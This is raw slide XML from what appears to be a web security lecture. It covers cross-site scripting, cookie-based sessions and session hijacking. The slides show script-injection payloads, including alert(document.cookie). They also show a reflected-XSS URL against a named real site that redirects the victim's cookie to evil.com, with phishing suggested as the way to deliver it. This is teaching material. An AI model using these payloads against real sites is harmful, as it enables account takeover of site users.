      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2814364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i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross site scripting (XSS)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smtClean="0"/>
              <a:t>is the ability to get a website to display </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>user-supplied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> content laced with malicious HTML/JavaScript”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0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 descr="Screen Shot 2012-07-02 at 3.31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1168400"/>
            <a:ext cx="3441700" cy="1270000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Screen Shot 2012-07-02 at 3.32.0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1143000"/>
            <a:ext cx="3073400" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Snip Single Corner Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3173506"/>
            <a:ext cx="6400800" cy="2058894"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="75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form name="XSS" action="#" method="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GET”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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p&gt;What's your name?&lt;/p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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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input type="text" name="name"&gt;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input type="submit" value="Submit"&gt;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/form&gt;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pre&gt;Hello David&lt;/pre&gt;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343400" y="1651000"/>
            <a:ext cx="685800" cy="381000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7" idx="2"/>
            <a:endCxn id="8" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4572000" y="2438400"/>
            <a:ext cx="2349500" cy="73510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806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07-02 at 3.36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150" y="1463862"/>
            <a:ext cx="3187700" cy="14351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47</a:t>
            </a:fld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>
            <a:off x="914400" y="3579906"/>
            <a:ext cx="7315200" cy="2211294"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="66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form name="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XSS" action="#" method="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GET”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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p&gt;What's your name?&lt;/p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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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input type="text" name="name"&gt;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input type="submit" value="Submit"&gt;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/form&gt;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pre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&gt;&gt;Hello David&lt;&lt;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/pre&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="2"/>
            <a:endCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2898962"/>
            <a:ext cx="0" cy="68094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33600" y="5448300"/>
            <a:ext cx="1828800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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455024" y="5692775"/>
            <a:ext cx="3200400" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97864"/>
              <a:gd name="adj2" fmla="val -49545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HTML chars not stripped</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37106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creen Shot 2012-07-02 at 4.08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00" y="1524000"/>
            <a:ext cx="3251200" cy="10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Lacing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48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33600" y="5448300"/>
            <a:ext cx="3810000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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228600" y="1778000"/>
            <a:ext cx="4648200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64783"/>
              <a:gd name="adj2" fmla="val -17332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&lt;script&gt;alert(“hi”);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="Screen Shot 2012-07-02 at 4.05.2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50" y="2971800"/>
            <a:ext cx="64897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63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nip Single Corner Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3579906"/>
            <a:ext cx="7315200" cy="2211294"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="6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form name="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XSS" action="#" method="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GET”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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p&gt;What's your name?&lt;/p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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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input type="text" name="name"&gt;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input type="submit" value="Submit"&gt;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/form&gt;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pre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&gt;&lt;script&gt;alert(“hi”)&lt;/script&gt;&lt;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/pre&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="Screen Shot 2012-07-02 at 4.08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00" y="1524000"/>
            <a:ext cx="3251200" cy="10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Lacing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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="2"/>
            <a:endCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4572000" y="2540000"/>
            <a:ext cx="2362200" cy="103990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33600" y="5448300"/>
            <a:ext cx="3810000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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455024" y="5905500"/>
            <a:ext cx="3200400" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97864"/>
              <a:gd name="adj2" fmla="val -49545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Injected code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228600" y="1778000"/>
            <a:ext cx="4648200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64783"/>
              <a:gd name="adj2" fmla="val -17332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&lt;script&gt;alert(“hi”);&lt;/script&gt;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90258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Security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1052927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(Other Models)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432105"/>
            <a:ext cx="835897" cy="120369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69" y="2702122"/>
            <a:ext cx="1140131" cy="663658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1524000" y="2842468"/>
            <a:ext cx="1472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99029" y="3033951"/>
            <a:ext cx="1472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19400" y="3259997"/>
            <a:ext cx="636874" cy="6368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3577" y="4191000"/>
            <a:ext cx="4776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Malicious Server Attacking Client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577" y="4816979"/>
            <a:ext cx="4776554" cy="212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Clickjacking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454" y="5578979"/>
            <a:ext cx="4776554" cy="212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History Probing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459" y="5197979"/>
            <a:ext cx="4776554" cy="212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Phishing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842" y="2438401"/>
            <a:ext cx="647050" cy="9317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811" y="2577534"/>
            <a:ext cx="994189" cy="578707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6211922" y="2715202"/>
            <a:ext cx="4174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211922" y="2906469"/>
            <a:ext cx="4174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99766" y="3173486"/>
            <a:ext cx="636157" cy="63615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334000" y="4154269"/>
            <a:ext cx="343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Malicious User in Multi-Server Application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867400" y="4916269"/>
            <a:ext cx="2713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in as someone else (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> failures)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29200" y="5750889"/>
            <a:ext cx="4117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Multi-Party Payment (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Paypal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Amazon Payments): Buy things for free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7735922" y="2715878"/>
            <a:ext cx="4174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735922" y="2906469"/>
            <a:ext cx="4174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4181" y="3207483"/>
            <a:ext cx="575057" cy="57505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91216" y="3227811"/>
            <a:ext cx="575057" cy="57505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444" y="2438401"/>
            <a:ext cx="647050" cy="93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39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75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HTTP is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>stateless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> protocol.  In order to introduce the notion of a session, web services uses cookies.  Sessions are identified by a unique cookie.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352800"/>
            <a:ext cx="2438400" cy="247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59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Authentication &amp;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Enrollment:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site asks user to pick username and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site stores both in backend database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Authentication:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site asks user for login information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Checks against backend database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sets user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>indicating successful login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Browser sends cookie on subsequent visits to indicate authenticated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A05C-7D88-9E4B-B6AC-1CE35ACF5DD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90600" y="2743200"/>
            <a:ext cx="7315200" cy="14478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Stealing cookies allows you to hijack a session without knowing the password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2310345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Sessions using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookies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1219200" y="1905000"/>
            <a:ext cx="1447800" cy="411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6172200" y="1905000"/>
            <a:ext cx="1447800" cy="411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1" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6454250" y="1447800"/>
            <a:ext cx="883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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55302" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1396992" y="1447800"/>
            <a:ext cx="1092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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55303" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2637574" y="2286000"/>
            <a:ext cx="3534626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4" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="345248">
            <a:off x="3416300" y="1828800"/>
            <a:ext cx="214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POST/login.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55305" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="4495800"/>
            <a:ext cx="3505200" cy="295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6" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2667000" y="3048000"/>
            <a:ext cx="3505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7" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2667000" y="5410200"/>
            <a:ext cx="3505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8" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="2651125" y="2895600"/>
            <a:ext cx="356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Set-cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55309" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="404233">
            <a:off x="3168650" y="4037381"/>
            <a:ext cx="2613025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/>
              <a:t>GET…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55310" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="3856038" y="5210175"/>
            <a:ext cx="11953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817075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creen Shot 2012-07-02 at 4.08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00" y="1524000"/>
            <a:ext cx="3251200" cy="10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Stealing Your Own Cookie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53</a:t>
            </a:fld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>
            <a:off x="762000" y="1524000"/>
            <a:ext cx="4114800" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64783"/>
              <a:gd name="adj2" fmla="val -17332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&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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alert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document.cookie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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/script&gt;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 descr="Screen Shot 2012-07-02 at 4.10.5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3497169"/>
            <a:ext cx="6273800" cy="2946400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70224" y="4800600"/>
            <a:ext cx="3318435" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 72438"/>
              <a:gd name="adj2" fmla="val 26005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My session token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1302656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“Reflected” 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Problem: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server reflects back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-laced input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Attack delivery method: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Send victims a link containing XSS attack, where the JavaScript retrieves the victim’s cookie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2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Reflected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 descr="Picture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736" y="1117124"/>
            <a:ext cx="9251472" cy="41406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9749" y="5230192"/>
            <a:ext cx="7784502" cy="10215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Up through 2009: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:b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www.lapdonline.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>search_terms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>script&gt;alert(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(example attack: send phish purporting link offers free Anti-virus)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cture 1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-1" r="2880" b="11204"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="1170467"/>
            <a:ext cx="5146896" cy="21061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Stealing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858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www.lapdonline.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search_results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/search/&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>view_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=1&amp;chg_filter=1&amp;searchType=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>content_basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search_terms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=%3Cscript%3Ealert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;%3C/script%3E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56</a:t>
            </a:fld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228600" y="1524000"/>
            <a:ext cx="4114800" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59513"/>
              <a:gd name="adj2" fmla="val -51635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&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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alert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document.cookie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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/script&gt;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38300" y="3657600"/>
            <a:ext cx="5867400" cy="6096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Phish with malicious URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4157227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61825" y="323335"/>
            <a:ext cx="3733800" cy="1555909"/>
          </a:xfrm>
          <a:prstGeom prst="downArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15543"/>
              <a:gd name="adj2" fmla="val 17569"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 6497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http://www.lapdonline.org/search_results/search/&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>view_all=1&amp;chg_filter=1&amp;searchType=content_basic&amp;search_terms=%3Cscript%3Edocument.location=‘evil.com/’ +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>%3C/script%3E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4538888"/>
            <a:ext cx="1240078" cy="1785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614" y="1525390"/>
            <a:ext cx="1905372" cy="11090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0346" y="845704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34200" y="951388"/>
            <a:ext cx="1102102" cy="11021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973" y="1525389"/>
            <a:ext cx="1905372" cy="1109097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3468414" y="2053490"/>
            <a:ext cx="1524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35414" y="2786587"/>
            <a:ext cx="0" cy="16002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261" y="4538888"/>
            <a:ext cx="1240078" cy="178571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5754414" y="2862787"/>
            <a:ext cx="0" cy="1524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087414" y="2862787"/>
            <a:ext cx="2088559" cy="16761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97150" y="2085832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“Check out this link!”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81345" y="5021440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lapdonline.org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31339" y="5086183"/>
            <a:ext cx="10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evil.com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8143" y="527084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81345" y="5468653"/>
            <a:ext cx="1102102" cy="110210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479628" y="2524858"/>
            <a:ext cx="2452053" cy="2123658"/>
          </a:xfrm>
          <a:prstGeom prst="left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http://www.lapdonline.org/search_results/search/&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>view_all=1&amp;chg_filter=1&amp;searchType=content_basic&amp;search_terms=%3Cscript%3Edocument.location=evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>%3C/script%3E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148586" y="3971288"/>
            <a:ext cx="1408386" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 58272"/>
              <a:gd name="adj2" fmla="val -10027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Response containing malicious JS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1148729" y="3557060"/>
            <a:ext cx="272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evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f9geiv33knv141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4165" y="3025741"/>
            <a:ext cx="3378922" cy="408623"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28625"/>
              <a:gd name="adj2" fmla="val 8307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Session token for lapdonline.org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7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/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="3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“Stored” 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Problem: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server stores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-laced input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Attack delivery method: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upload attack, users who view it are exploited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70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2-07-02 at 3.21.0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2" b="5882"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311150" y="283882"/>
            <a:ext cx="5854700" cy="2734236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Screen Shot 2012-07-02 at 3.18.5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8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311150" y="3346824"/>
            <a:ext cx="5943600" cy="34349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59</a:t>
            </a:fld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3016250" y="2758140"/>
            <a:ext cx="533400" cy="2804459"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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6325347" y="1653985"/>
            <a:ext cx="2730500" cy="1128060"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -135380"/>
              <a:gd name="adj2" fmla="val 347268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HTML bold for emphasis!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165850" y="3962400"/>
            <a:ext cx="2889997" cy="21336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Every browser that visits the page will run the “bold” command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2301038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Flaws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92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07-03 at 12.28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1511300"/>
            <a:ext cx="6070600" cy="3835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60</a:t>
            </a:fld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3124200" y="708213"/>
            <a:ext cx="4560047" cy="936815"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -18231"/>
              <a:gd name="adj2" fmla="val 122236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Fill in with &lt;script&gt;alert(“test”);&lt;script&gt;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143000" y="5594789"/>
            <a:ext cx="6858000" cy="118555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Every browser that visits the page will run the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>avascript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5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445" y="3842476"/>
            <a:ext cx="3614860" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28369"/>
              <a:gd name="adj2" fmla="val 33421"/>
              <a:gd name="adj3" fmla="val 46895"/>
              <a:gd name="adj4" fmla="val 8275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Posts comment with text:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
